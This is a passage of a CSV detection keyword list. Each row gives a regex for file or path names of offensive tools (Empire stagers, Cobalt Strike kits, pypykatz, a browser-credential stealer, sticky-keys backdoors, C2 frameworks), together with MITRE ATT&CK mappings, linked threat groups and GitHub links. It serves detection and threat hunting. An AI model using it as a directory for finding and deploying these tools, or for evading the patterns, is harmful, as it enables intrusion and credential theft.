- T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-dh-params.nse*",".{0,1000}\/ssl\-dh\-params\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-enum-ciphers.nse*",".{0,1000}\/ssl\-enum\-ciphers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-heartbleed.nse*",".{0,1000}\/ssl\-heartbleed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-known-key.nse*",".{0,1000}\/ssl\-known\-key\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-poodle.nse*",".{0,1000}\/ssl\-poodle\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sslv2.nse*",".{0,1000}\/sslv2\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sslv2-drown.nse*",".{0,1000}\/sslv2\-drown\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssp/decryptor.py",".{0,1000}\/ssp\/decryptor\.py","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*/SspiUacBypass.git*",".{0,1000}\/SspiUacBypass\.git.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*/ssploit/*",".{0,1000}\/ssploit\/.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*/SSRFmap*",".{0,1000}\/SSRFmap.{0,1000}","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","10","2756","484","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" "*/sstp-discover.nse*",".{0,1000}\/sstp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/StackCrypt.git*",".{0,1000}\/StackCrypt\.git.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","153","25","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*/stager.ps1*",".{0,1000}\/stager\.ps1.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/stager/powershell.py*",".{0,1000}\/stager\/powershell\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/stager/powershell/payload.ps1*",".{0,1000}\/stager\/powershell\/payload\.ps1.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/stagers/*.ps1*",".{0,1000}\/stagers\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/stagers/CSharpPS*",".{0,1000}\/stagers\/CSharpPS.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/StandIn.exe*",".{0,1000}\/StandIn\.exe.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*/StandIn.git*",".{0,1000}\/StandIn\.git.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*/StandIn_Net35.exe*",".{0,1000}\/StandIn_Net35\.exe.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*/StandIn_Net45.exe *",".{0,1000}\/StandIn_Net45\.exe\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*/StandIn-1.3.zip*",".{0,1000}\/StandIn\-1\.3\.zip.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*/stardust.x64.exe*",".{0,1000}\/stardust\.x64\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*/Stardust/scripts/loader.x64.exe*",".{0,1000}\/Stardust\/scripts\/loader\.x64\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*/start.sh dynamic *",".{0,1000}\/start\.sh\sdynamic\s.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*/start_campaign.py*",".{0,1000}\/start_campaign\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/startProxyPool?k=*&random=n&number=2&ip=*",".{0,1000}\/startProxyPool\?k\=.{0,1000}\&random\=n\&number\=2\&ip\=.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/startProxyPool?k=*&random=y&number=2*",".{0,1000}\/startProxyPool\?k\=.{0,1000}\&random\=y\&number\=2.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/StaticSyscallsAPCSpawn/*",".{0,1000}\/StaticSyscallsAPCSpawn\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/StaticSyscallsInject/*",".{0,1000}\/StaticSyscallsInject\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/StayKit.cna*",".{0,1000}\/StayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*/Staykit/StayKit.*",".{0,1000}\/Staykit\/StayKit\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*/Stealer.exe*",".{0,1000}\/Stealer\.exe.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*/Stealer.sln*",".{0,1000}\/Stealer\.sln.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*/stext credentials.log*",".{0,1000}\/stext\scredentials\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/stickykey.ps1*",".{0,1000}\/stickykey\.ps1.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","1","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*/Stickykeys.sh*",".{0,1000}\/Stickykeys\.sh.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*/StickyNotesExtract.exe*",".{0,1000}\/StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/stinger_client.py*",".{0,1000}\/stinger_client\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/Stompy.git*",".{0,1000}\/Stompy\.git.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*/Stompy.ps1*",".{0,1000}\/Stompy\.ps1.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*/StomPY.py*",".{0,1000}\/StomPY\.py.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*/Stowaway.git*",".{0,1000}\/Stowaway\.git.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","1","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*/stowaway_admin*",".{0,1000}\/stowaway_admin.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*/stowaway_agent*",".{0,1000}\/stowaway_agent.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*/Stracciatella/releases/latest/download/Stracciatella.exe*",".{0,1000}\/Stracciatella\/releases\/latest\/download\/Stracciatella\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*/striker.c",".{0,1000}\/striker\.c","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/Striker.git*",".{0,1000}\/Striker\.git.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/striker.local*",".{0,1000}\/striker\.local.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - 